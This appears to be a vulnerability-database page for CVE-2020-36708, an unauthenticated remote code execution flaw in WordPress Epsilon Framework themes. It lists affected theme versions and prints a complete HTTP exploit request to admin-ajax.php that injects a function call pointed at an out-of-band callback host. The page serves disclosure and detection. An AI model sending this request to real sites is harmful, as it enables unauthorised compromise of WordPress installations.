🔙 목록으로 돌아가기

CVE-2020-36708: WordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution

TitleWordPress Epsilon Framework Themes <=2.4.8 - Remote Code Execution
Authormadrobot
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary code remotely, leading to full site compromise.
RemediationUpdate themes to the latest versions where the vulnerability is fixed or apply security patches provided by theme developers.
CVSS Score9.8
EPSS Score0.90488
CVE IDCVE-2020-36708
CWE IDCWE-94
Tags wordpress rce cve cve2020 edb wpscan vkev vuln

🔍 Vulnerability Description

WordPress themes including Shapely <= 1.2.7, NewsMag <= 2.4.1, Activello <= 1.4.0, Illdy <= 2.1.4, Allegiant <= 1.2.2, Newspaper X <= 1.3.1, Pixova Lite <= 2.0.5, Brilliance <= 1.2.7, MedZone Lite <= 1.2.4, Regina Lite <= 2.0.4, Transcend <= 1.1.8, Affluent <= 1.1.0, Bonkers <= 1.0.4, Antreas <= 1.0.2, Sparkling <= 2.4.8, and NatureMag Lite <= 1.0.4 contain a function injection caused by epsilon_framework_ajax_action, letting unauthenticated attackers call functions and achieve remote code execution, exploit requires no authentication.

🌐 HTTP Request

POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=https://oast.me/

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-36708.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-36708.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A